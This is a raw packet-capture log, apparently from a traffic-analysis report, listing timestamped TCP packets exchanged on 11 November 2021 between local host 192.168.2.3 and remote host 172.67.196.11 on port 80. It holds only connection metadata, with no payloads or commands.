                                                                                                                          Nov 11, 2021 01:57:46.500075102 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500082970 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500114918 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500153065 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500183105 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500199080 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500238895 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500245094 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500277042 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500317097 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500325918 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500356913 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500396967 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500405073 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500437975 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500477076 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500490904 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500518084 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500557899 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500566006 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500596046 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500634909 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500642061 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500674963 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500714064 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500720978 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500755072 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500792980 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500806093 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500833035 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500890017 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500909090 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500952959 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500988960 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500999928 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501030922 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501070976 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501079082 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501110077 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501151085 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501166105 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501190901 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501230955 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501235962 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501270056 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501308918 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501322985 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501348972 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501388073 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501396894 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501426935 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501467943 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501472950 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501506090 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501545906 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501552105 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501585007 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501622915 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501631021 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501662016 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501699924 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501707077 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501739979 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501780033 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501786947 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501817942 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501857996 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501863003 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501898050 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501935959 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.501945019 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.501975060 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502015114 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502022028 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502054930 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502096891 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502099037 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502135992 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502188921 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502201080 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502230883 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502266884 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502281904 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502307892 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502347946 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502355099 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502388000 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502429008 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502434969 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502466917 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502507925 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502513885 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502549887 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502588034 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502598047 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502628088 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502666950 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502672911 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502706051 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502746105 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502753019 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502783060 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502823114 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502830029 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502861977 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502898932 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502908945 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.502937078 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502975941 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.502981901 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.503015995 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503057003 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503062010 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.503096104 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503151894 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503164053 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.503196955 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503236055 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503248930 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.503277063 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503315926 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503323078 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.503355026 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503393888 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503400087 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.503433943 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503473997 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503479958 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.503515959 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503554106 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503561020 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.503593922 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503633022 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503643036 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.503690958 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503736973 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503742933 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.503802061 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503849983 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.503874063 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.503957987 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504009962 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.504014969 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504079103 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504117966 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504126072 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.504158020 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504199028 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504208088 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.504272938 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504322052 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.504331112 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504394054 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504445076 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.504446030 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504511118 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504563093 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.504591942 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504658937 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504697084 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504710913 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.504738092 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.504785061 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.504812002 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505007029 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505060911 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.505084038 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505151987 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505203009 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.505223036 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505264044 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505325079 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.505362988 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505429029 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505498886 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505500078 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.505531073 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505577087 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.505580902 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505631924 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505681992 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505712986 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.505723953 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505775928 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505784035 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.505816936 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505861044 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505889893 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.505918026 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505968094 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.505981922 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.506010056 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506066084 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506067038 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.506114006 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506177902 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506182909 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.506231070 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506263018 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506282091 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.506321907 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506382942 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506385088 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.506439924 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506484032 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506493092 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.506515980 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506546021 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506571054 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506593943 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506623030 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506669044 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506699085 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.506720066 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506759882 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506776094 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.506804943 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506838083 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506858110 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.506899118 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506928921 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.506947041 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.506979942 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507011890 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507025003 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507044077 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507075071 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507107973 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507116079 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507141113 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507167101 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507174015 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507206917 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507230043 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507240057 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507272005 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507283926 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507303953 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507339001 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507364035 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507373095 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507400036 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507428885 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507451057 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507477045 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507503033 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507513046 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507546902 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507565022 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507584095 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507616043 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507628918 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507648945 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507679939 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507695913 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507710934 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507741928 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507761002 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507772923 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507805109 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507821083 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507838011 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507868052 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507885933 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507900953 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507934093 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507957935 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.507965088 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.507997990 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508028984 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508043051 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.508063078 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508097887 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508128881 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508168936 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508218050 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508234978 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.508251905 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.508255005 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508259058 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.508280993 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508308887 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508347988 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.508348942 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508411884 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.508413076 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508471012 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508514881 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.508527994 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508579016 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508583069 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.508634090 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508675098 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508682966 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.508734941 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508783102 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508858919 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.508914948 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.508977890 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.508981943 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.509037018 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.509089947 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.509108067 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.509171009 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.509222031 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.509227991 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.509304047 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.509352922 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.509362936 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.509418964 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.509459019 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.509469986 CET4975280192.168.2.3172.67.196.11
